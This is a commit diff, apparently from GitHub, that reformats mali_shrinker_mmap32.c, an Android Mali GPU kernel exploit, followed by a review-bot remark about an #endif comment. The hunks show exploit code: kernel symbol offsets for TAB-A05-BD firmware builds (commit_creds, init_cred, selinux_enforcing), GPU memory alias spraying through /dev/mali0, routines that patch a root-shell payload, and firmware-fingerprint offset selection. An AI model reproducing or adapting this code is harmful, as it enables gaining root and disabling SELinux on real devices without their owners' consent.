Align mali_shrinker_mmap32.c
Signed-off-by: Syuugo <[email protected]>
s1204IT authored Jun 11, 2024
1 parent 28b26ca commit cfc8d20
Showing 1 changed file with 8 additions and 11 deletions.
19 changes: 8 additions & 11 deletions mali_shrinker_mmap32.c
@@ -8,7 +8,7 @@
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>
#include "stdbool.h"
#include <stdbool.h>
#include <sys/system_properties.h>
#include <sys/syscall.h>

@@ -21,8 +21,7 @@
#else
#include <android/log.h>
#define LOG(fmt, ...) __android_log_print(ANDROID_LOG_ERROR, "exploit", fmt, ##__VA_ARGS__)

#endif // SHELL
#endif

#define MALI "/dev/mali0"

@@ -86,14 +85,15 @@ ADD_INIT = add x0, x0, #0x(Last 3 digits of INIT_CRED)
*/

// TAB-A05-BD 01.00.000
#define COMMIT_CREDS_CTX_01_00_000 0x5a120
#define AVC_DENY_CTX_01_00_000 0x35acc8
#define SELINUX_ENFORCING_CTX_01_00_000 0x129d9bc
#define SEL_READ_HANDLE_UNKNOWN_CTX_01_00_000 0x365d80
#define SEL_READ_ENFORCE_CTX_01_00_000 0x3653a8
#define SEL_READ_HANDLE_UNKNOWN_CTX_01_00_000 0x365d80
#define INIT_CRED_CTX_01_00_000 0x11553f0
#define COMMIT_CREDS_CTX_01_00_000 0x5a120
#define SELINUX_ENFORCING_CTX_01_00_000 0x129d9bc
#define ADD_INIT_CTX_01_00_000 0x910fc000
#define ADD_COMMIT_CTX_01_00_000 0x91048108
#define AVC_DENY_CTX_01_00_000 0x35acc8

// TAB-A05-BD 01.01.001
#define COMMIT_CREDS_CTX_01_01_001 0x5a120
@@ -468,14 +468,14 @@ uint64_t alias_sprayed_regions(int mali_fd) {
alias.in.aliasing_info = (uint64_t)(&(ai[0]));
mem_alias(mali_fd, &alias);
printf("alias gpu va %llx\n", alias.out.gpu_va);
/*
/*
uint64_t region_size = 0x1000 * SPRAY_NUM * SPRAY_PAGES;
void* region = mmap(NULL, region_size, PROT_READ, MAP_SHARED, mali_fd, alias.out.gpu_va);
if (region == MAP_FAILED) {
err(1, "mmap alias failed");
}
alias_regions[0] = region;
*/
*/
for (int i = 0; i < SPRAY_NUM; i++) {
void* this_region = mmap64(NULL, 0x1000 * SPRAY_PAGES, PROT_READ, MAP_SHARED, mali_fd, (uint64_t)alias.out.gpu_va + i * 0x1000 * SPRAY_PAGES);
if (this_region == MAP_FAILED) {
@@ -566,7 +566,6 @@ void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_en
}

void fixup_root_shell_nop() {

// Sets x0 to init_cred
root_code[ADRP_INIT_INDEX] = 0xD503201F;
root_code[ADD_INIT_INDEX] = 0xD503201F;
@@ -725,7 +724,6 @@ int run_enforce_un() {
return result;
}


void select_offset() {
char fingerprint[256];
int len = __system_property_get("ro.build.fingerprint", fingerprint);
@@ -940,7 +938,6 @@ int main() {
void* tracking_page = setup_tracking_page(mali_fd);
jit_init(mali_fd, 0x1000, 100, 0);


int mali_fd2 = open_dev(MALI);
setup_mali(mali_fd2, 1);
setup_tracking_page(mali_fd2);
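Review bot: In the second hunk (`@@ -21,8 +21,7 @@`) the `#endif` that closes the logging conditional loses its `// SHELL` marker, and because an `#else` branch sits between the opening directive and this line, the bare `#endif` no longer tells a reader which condition it ends. Keeping the marker as `#endif /* SHELL */` would fit a formatting-only commit and costs nothing. The opening `#ifdef`/`#ifndef` is outside the hunk, so the macro name here is taken from the removed comment only. The remaining hunks are blank-line removals, the `<stdbool.h>` include style and a reordering of the per-firmware `#define` table, which need no further comment.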
